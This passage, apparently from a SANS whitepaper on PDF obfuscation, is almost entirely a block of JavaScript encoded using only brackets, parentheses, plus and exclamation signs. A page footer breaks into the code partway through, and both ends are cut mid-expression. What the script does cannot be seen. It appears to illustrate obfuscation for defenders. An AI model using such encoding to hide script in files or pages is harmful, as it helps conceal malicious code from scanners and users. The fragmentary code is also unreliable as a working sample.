[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[!+[]+!+[]+!+[]+!+[]+!+[]+!+
[]+!+[]+!+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(
!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]
]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][(![]+[])[+[]]+(!![]+[])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!
+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!
+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[
+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]
+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]
+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]
+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+
[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+[![]]+[])[+[]])[+!+[]]+[][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!
+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()[(![]+[])[
+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+
(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!
+[]+!+[]]]()+[])[!+[]+!+[]]]((![]+[])[+!+[]]+(+[![]]+[])[+[]])[+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[]
)[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]
+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])
[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+
[![]]+[])[+[]])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]]([!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]])+(![
]+[])[+!+[]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+
[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+
(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][(![]+[])[+[]]+(!![]+[])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[
]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[
]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!
+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+
[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!
+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[]
[(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+
[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+[![]]+[])[+[]])[+!+[]]+[][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]
]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()[(![]+[])[+!+
[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[
]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+
!+[]]]()+[])[!+[]+!+[]]]((![]+[])[+!+[]]+(+[![]]+[])[+[]])[+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!
+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![
]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+
[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+[![]]
+[])[+[]])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]]([+!+[]]+[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]])+(![]+[])
[+!+[]]+(([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[
])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[
]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]
+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][
(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[
!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][(![]+[])[+[]]
+(!![]+[])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+((+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]©2012SANSInstiute,Authorretainsfurights.
©2012TheSANSInstitute Keyfingerprint=AF19FA272F94998DFDB5DE3DF8B506E4A1694E46 Authorretainsfullrights.
       PDF Obfuscation – A Primer 16
Author!Name,!email@address
+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])
[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!
+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[
]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[
]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![
]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+[![]]+[])[+[]])[+!+[]]+[][(![]+[])[!+[]+!+[]+!+[]]+(!
+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+
(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[
])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]
+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]]((![]+[])[+!+[]]+(+[![]]+[])[+[]])[+[]]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]
]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[]
)[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]())[(![]+[])[+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][(![]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([!
[]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+
[]+!+[]+!+[]]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]]()+[])[!+[]+!+[]]](+!+[]+[+[]]+(+[![]]+[])[+[]])[+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])
